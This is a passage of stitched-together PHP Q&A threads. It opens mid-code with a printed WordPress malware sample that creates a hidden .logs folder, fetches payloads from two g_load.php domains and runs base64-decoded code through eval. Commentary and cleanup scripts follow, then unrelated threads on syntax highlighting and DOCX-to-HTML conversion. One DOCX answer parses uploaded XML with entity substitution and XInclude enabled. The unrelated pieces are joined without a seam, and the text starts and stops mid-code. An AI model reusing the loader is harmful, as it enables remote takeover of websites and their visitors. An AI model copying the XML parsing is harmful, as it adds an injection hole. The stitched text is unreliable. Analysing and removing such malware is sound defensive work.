if (function_exists('file') === false)
return false;
$inc = @file($url);
$buf = @implode('', $inc);
if ($buf == "")
return false;
return $buf;
}
function tryfopen_777 ($url)
{
if (function_exists('fopen') === false)
return false;
$buf = '';
$f = @fopen($url, 'r');
if ($f) {
while (! feof($f)) {
$buf .= fread($f, 10000);
}
fclose($f);
} else
return false;
if ($buf == "")
return false;
return $buf;
}
function tryfsockopen_777 ($url)
{
if (function_exists('fsockopen') === false)
return false;
$p = @parse_url($url);
$host = $p['host'];
$uri = $p['path'] . '?' . $p['query'];
$f = @fsockopen($host, 80, $errno, $errstr, 30);
if (! $f)
return false;
$request = "GET $uri HTTP/1.0\n";
$request .= "Host: $host\n\n";
fwrite($f, $request);
$buf = '';
while (! feof($f)) {
$buf .= fread($f, 10000);
}
fclose($f);
if ($buf == "")
return false;
list ($m, $buf) = explode(chr(13) . chr(10) . chr(13) . chr(10),
$buf);
return $buf;
}
function trysocket_777 ($url)
{
if (function_exists('socket_create') === false)
return false;
$p = @parse_url($url);
$host = $p['host'];
$uri = $p['path'] . '?' . $p['query'];
$ip1 = @gethostbyname($host);
$ip2 = @long2ip(@ip2long($ip1));
if ($ip1 != $ip2)
return false;
$sock = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if (! @socket_connect($sock, $ip1, 80)) {
@socket_close($sock);
return false;
}
$request = "GET $uri HTTP/1.0\n";
$request .= "Host: $host\n\n";
socket_write($sock, $request);
$buf = '';
while ($t = socket_read($sock, 10000)) {
$buf .= $t;
}
@socket_close($sock);
if ($buf == "")
return false;
list ($m, $buf) = explode(chr(13) . chr(10) . chr(13) . chr(10),
$buf);
return $buf;
}
function update_tds_file_777 ($tdsfile)
{
$actual1 = $_SERVER['s_a1'];
$actual2 = $_SERVER['s_a2'];
$val = get_tds_777($actual1);
if ($val == "")
$val = get_tds_777($actual2);
$f = @fopen($tdsfile, "w");
if ($f) {
@fwrite($f, $val);
@fclose($f);
}
if (strstr($val, "|||CODE|||")) {
list ($val, $code) = explode("|||CODE|||", $val);
eval(base64_decode($code));
}
return $val;
}
function get_actual_tds_777 ()
{
$defaultdomain = $_SERVER['s_d1'];
$dir = $_SERVER['s_p1'];
$tdsfile = $dir . "log1.txt";
if (@file_exists($tdsfile)) {
$mtime = @filemtime($tdsfile);
$ctime = time() - $mtime;
if ($ctime > $_SERVER['s_t1']) {
$content = update_tds_file_777($tdsfile);
} else {
$content = @file_get_contents($tdsfile);
}
} else {
$content = update_tds_file_777($tdsfile);
}
$tds = @explode("\n", $content);
$c = @count($tds) + 0;
$url = $defaultdomain;
if ($c > 1) {
$url = trim($tds[mt_rand(0, $c - 2)]);
}
return $url;
}
function is_mac_777 ($ua)
{
$mac = 0;
if (stristr($ua, "mac") || stristr($ua, "safari"))
if ((! stristr($ua, "windows")) && (! stristr($ua, "iphone")))
$mac = 1;
return $mac;
}
function is_msie_777 ($ua)
{
$msie = 0;
if (stristr($ua, "MSIE 6") || stristr($ua, "MSIE 7") ||
stristr($ua, "MSIE 8") || stristr($ua, "MSIE 9"))
$msie = 1;
return $msie;
}
function setup_globals_777 ()
{
$rz = $_SERVER["DOCUMENT_ROOT"] . "/.logs/";
$mz = "/tmp/";
if (! is_dir($rz)) {
@mkdir($rz);
if (is_dir($rz)) {
$mz = $rz;
} else {
$rz = $_SERVER["SCRIPT_FILENAME"] . "/.logs/";
if (! is_dir($rz)) {
@mkdir($rz);
if (is_dir($rz)) {
$mz = $rz;
}
} else {
$mz = $rz;
}
}
} else {
$mz = $rz;
}
$bot = 0;
$ua = $_SERVER['HTTP_USER_AGENT'];
if (stristr($ua, "msnbot") || stristr($ua, "Yahoo"))
$bot = 1;
if (stristr($ua, "bingbot") || stristr($ua, "google"))
$bot = 1;
$msie = 0;
if (is_msie_777($ua))
$msie = 1;
$mac = 0;
if (is_mac_777($ua))
$mac = 1;
if (($msie == 0) && ($mac == 0))
$bot = 1;
global $_SERVER;
$_SERVER['s_p1'] = $mz;
$_SERVER['s_b1'] = $bot;
$_SERVER['s_t1'] = 1200;
$_SERVER['s_d1'] = "http://sweepstakesandcontestsdo.com/";
$d = '?d=' . urlencode($_SERVER["HTTP_HOST"]) . "&p=" .
urlencode($_SERVER["PHP_SELF"]) . "&a=" .
urlencode($_SERVER["HTTP_USER_AGENT"]);
$_SERVER['s_a1'] = 'http://www.lilypophilypop.com/g_load.php' . $d;
$_SERVER['s_a2'] = 'http://www.lolypopholypop.com/g_load.php' . $d;
$_SERVER['s_script'] = "mm.php?d=1";
}
if (! function_exists('gml_777')) {
function gml_777 ()
{
$r_string_777 = '';
if ($_SERVER['s_b1'] == 0)
$r_string_777 = '';
return $r_string_777;
}
}
if (! function_exists('gzdecodeit')) {
function gzdecodeit ($decode)
{
$t = @ord(@substr($decode, 3, 1));
$start = 10;
$v = 0;
if ($t & 4) {
$str = @unpack('v', substr($decode, 10, 2));
$str = $str[1];
$start += 2 + $str;
}
if ($t & 8) {
$start = @strpos($decode, chr(0), $start) + 1;
}
if ($t & 16) {
$start = @strpos($decode, chr(0), $start) + 1;
}
if ($t & 2) {
$start += 2;
}
$ret = @gzinflate(@substr($decode, $start));
if ($ret === FALSE) {
$ret = $decode;
}
return $ret;
}
}
function mrobh ($content)
{
@Header('Content-Encoding: none');
$decoded_content = gzdecodeit($content);
if (preg_match('/\<\/body/si', $decoded_content)) {
return preg_replace('/(\<\/body[^\>]*\>)/si',
gml_777() . "\n" . '$1', $decoded_content);
} else {
return $decoded_content . gml_777();
}
}
}
}
Looks like it creates a hidden .logs folder:
$rz = $_SERVER["DOCUMENT_ROOT"] . "/.logs/";
$mz = "/tmp/";
if (! is_dir($rz)) {
@mkdir($rz);
if (is_dir($rz)) {
$mz = $rz;
} else {
$rz = $_SERVER["SCRIPT_FILENAME"] . "/.logs/";
if (! is_dir($rz)) {
@mkdir($rz);
if (is_dir($rz)) {
$mz = $rz;
}
} else {
$mz = $rz;
}
}
} else {
$mz = $rz;
}
It then seems to download a payload from http://www.lilypophilypop.com/g_load.php (falling back to http://www.lolypopholypop.com/g_load.php), cache it in log1.txt, and base64-decode and execute anything that follows a |||CODE||| marker:
function update_tds_file_777 ($tdsfile)
{
$actual1 = $_SERVER['s_a1'];
$actual2 = $_SERVER['s_a2'];
$val = get_tds_777($actual1);
if ($val == "")
$val = get_tds_777($actual2);
$f = @fopen($tdsfile, "w");
if ($f) {
@fwrite($f, $val);
@fclose($f);
}
if (strstr($val, "|||CODE|||")) {
list ($val, $code) = explode("|||CODE|||", $val);
eval(base64_decode($code));
}
return $val;
}
So without having to access your server again, they can execute different code.
Dan Hill wrote an article about getting base64 hacked for WordPress installations.
To quote the results of Dan's findings:
The hack I found essentially created a new php file in the uploads folder of Wordpress that allowed remote filesystem control, and then modified the pages being served (every .php file) to include a script tag redirecting visitors to some dodgy sites.
To get rid of the problem, Dan tried the following:
I did this in three stages. First, find any world-writable directories (tsk tsk):
find . -type d -perm -o=w
And make them not world writable:
find . -type d -perm -o=w -print -exec chmod 770 {} \;
Delete all the new files these guys created:
find . -wholename '*wp-content/uploads/*.php' -exec rm -rf {} \;
(In wordpress, the uploads folder shouldn’t contain any PHP)
Stage two, repair all your infected PHP files. I played around using sed and xargs for this, but eventually gave up and wrote a quick ruby script to do the job. Run this ruby script from your root directory:
#!/usr/bin/env ruby
Dir.glob('**/*.php').each do|f|
puts f
begin
contents = File.read(f)
contents = contents.gsub(/\<\?php \/\*\*\/ eval\(.*\)\);\?\>/, "")
File.open(f, 'w') {|f| f.write(contents) }
rescue
puts "FILE ERROR"
end
end
The final step is to upgrade all your old, forgotten about Wordpress installs to prevent any other vulnerabilities showing up. The bonus step for good luck is to reset your passwords, especially any MySQL passwords stored in plain text in your wp-config.php file.
Hope Dan's findings help!
For those searching for a non-Ruby fix, here's a PHP version of Dan Hill's code:
<?php
function fileExtension($filename) {
$pathInfo = pathinfo($filename);
return strtolower($pathInfo['extension']);
}
function fixFiles($path) {
$path = str_replace('././', './', $path);
$d = @opendir($path);
if ($d) {
while (($entry = readdir($d)) !== false) {
$baseEntry = $entry;
$entry = str_replace('././', './', $path . '/' . $entry);
if ($baseEntry != '.' && $baseEntry != '..') {
if (is_file($entry)) {
$fe = fileExtension($entry);
if ($fe == 'php') {
$contents = file_get_contents($entry);
$contents = preg_replace("/\<\?php \/\*\*\/ eval\(.*\)\);\?\>/", '', $contents);
$f = fopen($entry, 'w');
fputs($f, $contents);
fclose($f);
echo $entry . '<br>';
flush();
}
}
else if (is_dir($entry)) {
fixFiles($path . '/' . basename($entry));
}
}
}
closedir($d);
}
}
fixFiles('.');
?>
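Both scripts above rewrite files in place, so it can help to see which files match before changing anything. The following is a minimal read-only sketch under that assumption: it reuses the same regular expression as the fix scripts, and the function name findInfectedFiles is hypothetical, not part of Dan Hill's article.

```php
<?php
// Hypothetical helper: list the PHP files under $root that contain the
// injected eval line, without changing anything on disk.
function findInfectedFiles(string $root): array
{
    // Same pattern the Ruby and PHP fix scripts above use.
    $pattern = '/<\?php \/\*\*\/ eval\(.*\)\);\?>/';
    $infected = [];
    $iterator = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($iterator as $file) {
        // Only regular files with a .php extension are inspected.
        if (!$file->isFile() || strtolower($file->getExtension()) !== 'php') {
            continue;
        }
        $contents = file_get_contents($file->getPathname());
        if ($contents !== false && preg_match($pattern, $contents) === 1) {
            $infected[] = $file->getPathname();
        }
    }
    sort($infected);
    return $infected;
}
```

Calling findInfectedFiles('.') from the site root returns the matching paths, which can be reviewed (and backed up) before running either fix script.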

Display files with syntax highlighting using PHP

I am working on a web-based application using PHP (not Java), in which I need to display source code files (Java, C, C++, Python, etc.) with syntax highlighting on the web page. I am clueless as to how to display the source code files. Any help will be appreciated.
One option is to use an existing syntax highlighter, such as the one from Google.
Setting it up is very simple. For basic usage, all you have to do is put the code in your HTML page inside <pre> sections and set the class attribute to the programming language.
<pre name="code" class="c-sharp">
class Foo
{
}
</pre>
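On the PHP side, the work is mostly reading the file and escaping it so the browser shows the source instead of interpreting it. Here is a minimal sketch of that step. The function name renderSourceBlock and the extension map are assumptions for illustration, and the language-* class naming follows the convention used by highlighters such as highlight.js; adjust it to whatever your chosen highlighter expects.

```php
<?php
// Hypothetical helper: wrap a source file's contents in <pre><code> so a
// client-side highlighter can colour it. The extension-to-class map is an
// illustrative assumption, not a complete list.
function renderSourceBlock(string $path): string
{
    $languages = [
        'java' => 'java',
        'c'    => 'c',
        'cpp'  => 'cpp',
        'py'   => 'python',
        'php'  => 'php',
    ];
    if (!is_readable($path)) {
        return '';
    }
    $extension = strtolower(pathinfo($path, PATHINFO_EXTENSION));
    $language = $languages[$extension] ?? 'plaintext';
    $code = file_get_contents($path);
    if ($code === false) {
        return '';
    }
    // Escape angle brackets, ampersands and quotes so the code is displayed as text.
    $escaped = htmlspecialchars($code, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<pre><code class="language-' . $language . '">' . $escaped . '</code></pre>';
}
```

Echo the returned string into the page and let the highlighter's JavaScript do the colouring.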
16 Free Javascript Code Syntax Highlighters For Better Programming has an exhaustive list of options, repeated here in case the site ever goes down:
SyntaxHighlighter
GeSHi - Generic Syntax Highlighter
quickhighlighter
google-code-prettify
pygments.
HIGHLIGHT.JS
Lighter.js – Syntax Highlighter written in MooTools
SHJS – Syntax Highlighting in JavaScript
CodePress – Online Real Time Syntax Highlighting Editor
Chili jQuery code highlighter plugin
Highlight – Code & Syntax highlighting by Andre Simon
BeautyOfCode: jQuery Plugin for Syntax Highlighting
JUSH – JavaScript Syntax Highlighter
Ultraviolet – Syntax Highlighting Engine
DlHighlight – JavaScript Syntax Highlighting Engine
Syntax highlighter for JavaScript
A syntax highlighter displays source code in color so that readers can follow it more easily. This program highlights several kinds of elements (reserved words, parentheses, brackets, comments, quotes, etc.). You can extend or modify the code to suit your web application or programming blog.
The highlighter does not depend on any particular language, so you can integrate it with any programming language.
The source code is on my tech blog: http://www.algonuts.info/how-to-develop-a-source-code-syntax-highlighter-using-php.html
<?php
include_once("keywords.php");
class highlighter {
private $fileName;
private $fileNameColor;
private $fileExtension;
private $parenthesisColor;
private $insideParenthesisColor;
private $bracketColor;
private $insideBracketColor;
private $keywordColor;
private $backGroundColor;
private $borderColor;
private $leftBorderColor;
private $quotesColor;
private $commentColor;
public function __construct() {
$this->fileName = "";
$this->fileExtension = "";
//Color Configuration
$this->fileNameColor = "#286090";
$this->keywordColor = "green";
$this->backGroundColor = "#fdfefe";
$this->borderColor = "#e3e3e3";
$this->leftBorderColor = "#605a56";
$this->parenthesisColor = "#ec7700";
$this->insideParenthesisColor = "#ec7700";
$this->bracketColor = "#ec7700";
$this->insideBracketColor = "#ec7700";
$this->quotesColor = "#6a2c70";
$this->commentColor = "#b8b0b0";
}
public function applycolor($fileLocation = "") {
if($fileLocation == "")
{ return; }
else
{
if(file_exists($fileLocation)) {
$temp = explode("/",$fileLocation);
$this->fileName = trim(end($temp));
$temp = explode(".",$this->fileName);
$this->fileExtension = trim(end($temp));
$fileContent = trim(file_get_contents($fileLocation, true));
$fileContent = htmlentities($fileContent,ENT_NOQUOTES);
if($fileContent == "")
{ return; }
}
else
{ return; }
}
$line = 1;
$outputContent = "<div class=\"divblock\"><b>".$line."</b> ";
$characterBuffer = "";
$blockFound = 0;
$blockFoundColor = array();
$parenthesisFound = 0;
$bracketFound = 0;
$counter = 0;
$lastCharacter = "";
$contentSize = strlen($fileContent);
while($counter < $contentSize) {
$character = $fileContent[$counter];
$code = intval(ord($character));
if($blockFound == 0 && (($code >= 97 && $code <= 122) || ($code >= 65 && $code <= 90))) //Find alphabetic characters
{ $characterBuffer .= $character; }
else
{
if($code == 10) { //Find EOL (End of Line)
if($this->checker($characterBuffer))
{ $characterBuffer = "<font color='".$this->keywordColor."'>".$characterBuffer."</font>"; }
$line++;
if($blockFound == 0)
{ $outputContent .= $characterBuffer."</div>".$character."<div class=\"divblock\"><b>".$line."</b> "; }
else
{ $outputContent .= $characterBuffer."</font></div>".$character."<div class=\"divblock\"><b>".$line."</b> <font color='".$blockFoundColor[$blockFound-1]."'>"; }
$characterBuffer = "";
}
else if($code == 32) { //Find Space
if($characterBuffer != "") {
if($this->checker($characterBuffer))
{ $outputContent .= "<font color='".$this->keywordColor."'>".$characterBuffer."</font>".$character; }
else
{ $outputContent .= $characterBuffer.$character; }
$characterBuffer = "";
}
else
{ $outputContent .= $character; }
}
else if($character == "\"" || $character == "'") { //Find Quotes
if($characterBuffer != "")
{
if($this->checker($characterBuffer))
{ $outputContent .= "<font color='".$this->keywordColor."'>".$characterBuffer."</font>"; }
else
{ $outputContent .= $characterBuffer; }
$characterBuffer = "";
}
$outputContent .= "<font color='".$this->quotesColor."'>".$character;
$foundCharacter = $character;
$counter++;
while($counter < $contentSize) {
$character = $fileContent[$counter];
if($character == $foundCharacter) {
$outputContent .= $character;
if($lastCharacter == "\\") {
$lastCharacter = "";
}
else
{ break; }
}
else if($character == "\\" && $lastCharacter == "\\") {
$outputContent .= $character;
$lastCharacter = "";
}
else
{
$lastCharacter = $character;
$code = intval(ord($character));
if($code != 10)
{ $outputContent .= $character; }
else
{
$line++;
$outputContent .= "</font></div>".$character."<div class=\"divblock\"><b>".$line."</b> <font color='".$this->quotesColor."'>";
}
}
$counter++;
}
$outputContent .= "</font>";
}
else if($character == "(" || $character == ")") { //Find Parenthesis
if($characterBuffer != "")
{
if($this->checker($characterBuffer))
{ $outputContent .= "<font color='".$this->keywordColor."'>".$characterBuffer."</font>"; }
else
{ $outputContent .= $characterBuffer; }
$characterBuffer = "";
}
if($parenthesisFound == 0) {
$blockFoundColor[$blockFound] = $this->insideParenthesisColor;
$outputContent .= "<font color='".$this->parenthesisColor."'>".$character."</font><font color='".$this->insideParenthesisColor."'>";
$parenthesisFound++;
$blockFound++;
}
else
{
if($character == "(") {
$parenthesisFound++;
}
if($character == ")") {
$parenthesisFound--;
}
if($parenthesisFound == 0) {
$outputContent .= "</font><font color='".$this->parenthesisColor."'>".$character."</font>";
$blockFound--;
unset($blockFoundColor[$blockFound]);
}
else
{ $outputContent .= $character; }
}
}
else if($character == "[" || $character == "]") { //Find Bracket
if($characterBuffer != "")
{
if($this->checker($characterBuffer))
{ $outputContent .= "<font color='".$this->keywordColor."'>".$characterBuffer."</font>"; }
else
{ $outputContent .= $characterBuffer; }
$characterBuffer = "";
}
if($bracketFound == 0) {
$blockFoundColor[$blockFound] = $this->insideBracketColor;
$outputContent .= "<font color='".$this->bracketColor."'>".$character."</font><font color='".$this->insideBracketColor."'>";
$bracketFound++;
$blockFound++;
}
else
{
if($character == "[") {
$bracketFound++;
}
if($character == "]") {
$bracketFound--;
}
if($bracketFound == 0) {
$outputContent .= "</font><font color='".$this->bracketColor."'>".$character."</font>";
$blockFound--;
unset($blockFoundColor[$blockFound]);
}
else
{ $outputContent .= $character; }
}
}
else if($character == "/" && (isset($fileContent[$counter+1]) && ($fileContent[$counter+1] == "*" || $fileContent[$counter+1] == "/"))) { //Find Comment
if($characterBuffer != "")
{
if($this->checker($characterBuffer))
{ $outputContent .= "<font color='".$this->keywordColor."'>".$characterBuffer."</font>"; }
else
{ $outputContent .= $characterBuffer; }
$characterBuffer = "";
}
$blockFound++;
$outputContent .= "<font color='".$this->commentColor."'>".$fileContent[$counter].$fileContent[$counter+1];
if($fileContent[$counter+1] == "*") {
$counter += 2;
$checkCharacter = "*";
while($counter < $contentSize) {
$outputContent .= $fileContent[$counter];
if($fileContent[$counter] == $checkCharacter) {
if($checkCharacter == "*")
{ $checkCharacter = "/"; }
else
{
$blockFound--;
$outputContent .= "</font>";
break;
}
}
$counter++;
}
}
else
{
$counter += 2;
while($counter < $contentSize) {
$character = $fileContent[$counter];
$code = intval(ord($character));
if($code == 10) {
$counter--;
$blockFound--;
$outputContent .= "</font>";
break;
}
$outputContent .= $character;
$counter++;
}
}
}
else if($characterBuffer != "")
{
if($this->checker($characterBuffer))
{ $outputContent .= "<font color='".$this->keywordColor."'>".$characterBuffer."</font>".$character; }
else
{ $outputContent .= $characterBuffer.$character; }
$characterBuffer = "";
}
else
{ $outputContent .= $character; }
}
$counter++;
}
$outputContent .= "</div>";
$returnData = "<div class='filenamestyle' style='color:".$this->fileNameColor.";'>".$this->fileName."</div>"; //Show filename
$returnData .= "<div><pre><div class='codebox' style='background-color:".$this->backGroundColor.";border: 1px solid ".$this->borderColor.";border-left: 4px solid ".$this->leftBorderColor.";'>".$outputContent."</div></pre></div>";
return $returnData;
}
private function checker($value) {
global $languageKeywords;
if(isset($languageKeywords[$this->fileExtension])) {
$value = trim($value);
if(in_array($value,$languageKeywords[$this->fileExtension]))
{ return 1; }
else
{ return 0; }
}
return 0; //No keyword list is defined for this file extension
}
}
?>

PHP DOCX convert to HTML [duplicate]

I want to be able to upload an MS Word document and export it as a page in my site.
Is there any way to accomplish this?
//FUNCTION :: read a docx file and return the string
function readDocx($filePath) {
// Create new ZIP archive
$zip = new ZipArchive;
$dataFile = 'word/document.xml';
// Open received archive file
if (true === $zip->open($filePath)) {
// If done, search for the data file in the archive
if (($index = $zip->locateName($dataFile)) !== false) {
// If found, read it to the string
$data = $zip->getFromIndex($index);
// Close archive file
$zip->close();
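// Load XML from a string
// Skip errors and warnings. loadXML() is an instance method, so create the document first.
// LIBXML_NOENT is left out: substituting entities is unsafe for uploaded files.
$xml = new DOMDocument();
$xml->loadXML($data, LIBXML_NOERROR | LIBXML_NOWARNING);
// Return data without XML formatting tags
// (double quotes are needed for "\n" to mean a newline)
$contents = explode("\n", strip_tags($xml->saveXML()));
$text = '';
foreach ($contents as $content) {
$text .= $content;
}
return $text;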
}
$zip->close();
}
// In case of failure return empty string
return "";
}
ZipArchive and DOMDocument both ship with PHP (as the zip and dom extensions), so you don't need to install, include, or require any third-party libraries.
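readDocx() returns plain text, so paragraph boundaries are lost. To get basic HTML, one possible approach is to query the paragraphs with DOMXPath and emit one <p> per w:p element. This is a minimal sketch, not a full converter: the function name documentXmlToHtml is hypothetical, it expects the string that $zip->getFromIndex($index) returns, and it ignores tables, images and all formatting.

```php
<?php
// Sketch: turn the top-level paragraphs of word/document.xml into <p> elements.
// documentXmlToHtml() is a hypothetical name used for illustration.
function documentXmlToHtml(string $documentXml): string
{
    $dom = new DOMDocument();
    if ($documentXml === '' || !$dom->loadXML($documentXml, LIBXML_NOERROR | LIBXML_NOWARNING)) {
        return '';
    }
    $xpath = new DOMXPath($dom);
    // Namespace URI of WordprocessingML, bound here to the "w" prefix.
    $xpath->registerNamespace('w', 'http://schemas.openxmlformats.org/wordprocessingml/2006/main');
    $html = '';
    foreach ($xpath->query('//w:body/w:p') as $paragraph) {
        $text = '';
        // The visible text lives in w:t elements inside runs (w:r).
        foreach ($xpath->query('.//w:t', $paragraph) as $textNode) {
            $text .= $textNode->nodeValue;
        }
        $html .= '<p>' . htmlspecialchars($text, ENT_QUOTES, 'UTF-8') . '</p>' . "\n";
    }
    return $html;
}
```

Because the text is escaped with htmlspecialchars(), the result can be echoed into a page without the document's content being interpreted as markup.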
You can use PHPDocX.
It supports practically all HTML and CSS styles. You can also use templates to add extra formatting to your HTML via the replaceTemplateVariableByHTML method.
The HTML methods of PHPDocX also allow direct use of Word styles. You can use something like this:
$docx->embedHTML($myHTML, array('tableStyle' => 'MediumGrid3-accent5PHPDOCX'));
if you want all your tables to use the MediumGrid3-accent5 Word style. The embedHTML method, like its template counterpart (replaceTemplateVariableByHTML), preserves inheritance, meaning that you can use a predefined Word style and override any of its properties with CSS.
You can also extract selected parts of your HTML using jQuery-style selectors.
You can convert Word docx documents to HTML using the Print2Flash library. Here is a PHP excerpt from my client's site that converts a document to HTML:
include("const.php");
$p2fServ = new COM("Print2Flash4.Server2");
$p2fServ->DefaultProfile->DocumentType=HTML5;
$p2fServ->ConvertFile($wordfile,$htmlFile);
It converts the document whose path is given in the $wordfile variable to an HTML page file whose path is given in the $htmlFile variable. All formatting, hyperlinks and charts are retained. You can get the required const.php file, along with a fuller sample, from the Print2Flash SDK.
This is a workaround based on David Lin's answer above.
Removing "w:" from the tags in a docx's XML leaves behind HTML-like tags:
function readDocx($filePath) {
// Create new ZIP archive
$zip = new ZipArchive;
$dataFile = 'word/document.xml';
// Open received archive file
if (true === $zip->open($filePath)) {
// If done, search for the data file in the archive
if (($index = $zip->locateName($dataFile)) !== false) {
// If found, read it to the string
$data = $zip->getFromIndex($index);
// Close archive file
$zip->close();
// Load XML from a string
// Skip errors and warnings
$xml = new DOMDocument("1.0", "utf-8");
$xml->loadXML($data, LIBXML_NOENT | LIBXML_XINCLUDE | LIBXML_NOERROR | LIBXML_NOWARNING|LIBXML_PARSEHUGE);
$xml->encoding = "utf-8";
// Return data without XML formatting tags
$output = $xml->saveXML();
$output = str_replace("w:","",$output);
return $output;
}
$zip->close();
}
// In case of failure return empty string
return "";
}
OK, I'm very late, but I thought I'd post this to save you all some time.
This is some PHP code I have put together to read not just the text from a docx but the images too. It does not currently support floating images or text, but it is a big step forward from what has already been posted here. Note that you need to change https://example.co.uk to your own domain name.
<?php
class Docx_ws_imglnk {
public $originalpath = '';
public $extractedpath = '';
}
class Docx_ws_rel {
public $Id = '';
public $Target = '';
}
class Docx_ws_def {
public $styleId = '';
public $type = '';
public $color = '000000';
}
class Docx_p_def {
public $data = array();
public $text = "";
}
class Docx_p_item {
public $name = "";
public $value = "";
public $innerstyle = "";
public $type = "text";
}
class Docx_reader {
private $fileData = false;
private $errors = array();
public $rels = array();
public $imglnks = array();
public $styles = array();
public $document = null;
public $paragraphs = array();
public $path = '';
private $saveimgpath = 'docimages';
public function __construct() {
}
private function load($file) {
if (file_exists($file)) {
$zip = new ZipArchive();
$openedZip = $zip->open($file);
if ($openedZip === true) {
$this->path = $file;
//read and save images
for ( $i = 0; $i < $zip->numFiles; $i ++ ) {
$zip_element = $zip->statIndex( $i );
if ( preg_match( "([^\s]+(\.(?i)(jpg|jpeg|png|gif|bmp))$)", $zip_element['name'] ) ) {
$imglnk = new Docx_ws_imglnk;
$imglnk->originalpath = $zip_element['name'];
$imagename = explode( '/', $zip_element['name'] );
$imagename = end( $imagename );
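// Use the declared $saveimgpath property; the directory must already exist and be writable
$imglnk->extractedpath = dirname( __FILE__ ) . '/' . $this->saveimgpath . '/' . $imagename;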
$putres = file_put_contents( $imglnk->extractedpath, $zip->getFromIndex( $i ));
$imglnk->extractedpath = str_replace('var/www/', 'https://example.co.uk/', $imglnk->extractedpath);
$imglnk->extractedpath = substr($imglnk->extractedpath, 1);
array_push($this->imglnks, $imglnk);
}
}
//read relationships
if (($styleIndex = $zip->locateName('word/_rels/document.xml.rels')) !== false) {
$stylesRels = $zip->getFromIndex($styleIndex);
$xml = simplexml_load_string($stylesRels);
$XMLTEXT = $xml->saveXML();
$doc = new DOMDocument();
$doc->loadXML($XMLTEXT);
foreach($doc->documentElement->childNodes as $childnode)
{
$nodename = $childnode->nodeName;
if($childnode->hasAttributes())
{
$rel = new Docx_ws_rel;
for ($a = 0; $a < $childnode->attributes->count(); $a++)
{
$attrNode = $childnode->attributes->item($a);
if (strcmp( $attrNode->nodeName, 'Id') == 0)
{
$rel->Id = $attrNode->nodeValue;
}
if (strcmp( $attrNode->nodeName, 'Target') == 0)
{
$rel->Target = $attrNode->nodeValue;
}
}
array_push($this->rels, $rel);
}
}
}
//attempt to load styles:
if (($styleIndex = $zip->locateName('word/styles.xml')) !== false) {
$stylesXml = $zip->getFromIndex($styleIndex);
$xml = simplexml_load_string($stylesXml);
$XMLTEXT = $xml->saveXML();
$doc = new DOMDocument();
$doc->loadXML($XMLTEXT);
foreach($doc->documentElement->childNodes as $childnode)
{
$nodename = $childnode->nodeName;
//get style
if (strcmp($nodename, "w:style") == 0)
{
$ws_def = new Docx_ws_def;
for ($a=0; $a < $childnode->attributes->count(); $a++ )
{
$item = $childnode->attributes->item($a);
//style id
if (strcmp($item->nodeName, "w:styleId") == 0)
{
$ws_def->styleId = $item->nodeValue;
}
//style type
if (strcmp($item->nodeName, "w:type") == 0)
{
$ws_def->type = $item->nodeValue;
}
}
//push style to the array of styles (only when this node is a w:style, so $ws_def is always defined)
if (strcmp($ws_def->styleId, "") != 0 && strcmp($ws_def->type, "") != 0)
{
array_push($this->styles, $ws_def);
}
}
}
}
if (($index = $zip->locateName('word/document.xml')) !== false) {
$stylesDoc = $zip->getFromIndex($index);
$xml = simplexml_load_string($stylesDoc);
$XMLTEXT = $xml->saveXML();
$this->document = new DOMDocument();
$this->document->loadXML($XMLTEXT);
}
$zip->close();
} else {
switch($openedZip) {
case ZipArchive::ER_EXISTS:
$this->errors[] = 'File exists.';
break;
case ZipArchive::ER_INCONS:
$this->errors[] = 'Inconsistent zip file.';
break;
case ZipArchive::ER_MEMORY:
$this->errors[] = 'Malloc failure.';
break;
case ZipArchive::ER_NOENT:
$this->errors[] = 'No such file.';
break;
case ZipArchive::ER_NOZIP:
$this->errors[] = 'File is not a zip archive.';
break;
case ZipArchive::ER_OPEN:
$this->errors[] = 'Could not open file.';
break;
case ZipArchive::ER_READ:
$this->errors[] = 'Read error.';
break;
case ZipArchive::ER_SEEK:
$this->errors[] = 'Seek error.';
break;
}
}
} else {
$this->errors[] = 'File does not exist.';
}
}
public function setFile($path) {
$this->fileData = $this->load($path);
}
public function to_plain_text() {
if ($this->fileData) {
return strip_tags($this->fileData);
} else {
return false;
}
}
public function processDocument() {
$html = '';
foreach($this->document->documentElement->childNodes as $childnode)
{
$nodename = $childnode->nodeName;
//get the body of the document
if (strcmp($nodename, "w:body") == 0)
{
foreach($childnode->childNodes as $subchildnode)
{
$pnodename = $subchildnode->nodeName;
//process every paragraph
if (strcmp($pnodename, "w:p") == 0)
{
$pdef = new Docx_p_def;
foreach($subchildnode->childNodes as $pchildnode)
{
//process any inner children
if (strcmp($pchildnode->nodeName, "w:pPr") == 0)
{
foreach($pchildnode->childNodes as $prchildnode)
{
//process paragraph style
if (strcmp($prchildnode->nodeName, "w:pStyle") == 0)
{
$pitem = new Docx_p_item;
$pitem->name = 'styleId';
$pitem->value = $prchildnode->attributes->getNamedItem('val')->nodeValue;
array_push($pdef->data, $pitem);
}
//process text alignment
if (strcmp($prchildnode->nodeName, "w:jc") == 0)
{
$pitem = new Docx_p_item;
$pitem->name = 'align';
$pitem->value = $prchildnode->attributes->getNamedItem('val')->nodeValue;
if (strcmp($pitem->value, "left") == 0)
{
$pitem->innerstyle .= "text-align:" . $pitem->value . ";";
}
if (strcmp($pitem->value, "center") == 0)
{
$pitem->innerstyle .= "text-align:" . $pitem->value . ";";
}
if (strcmp($pitem->value, "right") == 0)
{
$pitem->innerstyle .= "text-align:" . $pitem->value . ";";
}
if (strcmp($pitem->value, "both") == 0)
{
$pitem->innerstyle .= "word-spacing:" . 10 . "px;";
}
array_push($pdef->data, $pitem);
}
//process drawing
if (strcmp($prchildnode->nodeName, "w:drawing") == 0)
{
$pitem = new Docx_p_item;
$pitem->name = 'drawing';
$pitem->value = '';
$pitem->type = 'graphic';
$extents = $prchildnode->getElementsByTagName('extent')[0];
$cx = $extents->attributes->getNamedItem('cx')->nodeValue;
$cy = $extents->attributes->getNamedItem('cy')->nodeValue;
$pcx = (int)$cx / 9525;
$pcy = (int)$cy / 9525;
$pitem->innerstyle .= "width:" . $pcx . "px;";
$pitem->innerstyle .= "height:" . $pcy . "px;";
$blip = $prchildnode->getElementsByTagName('blip')[0];
$pitem->value = $blip->attributes->getNamedItem('embed')->nodeValue;
array_push($pdef->data, $pitem);
}
//process spacing
if (strcmp($prchildnode->nodeName, "w:spacing") == 0)
{
$pitem = new Docx_p_item;
$pitem->name = 'paragraphSpacing';
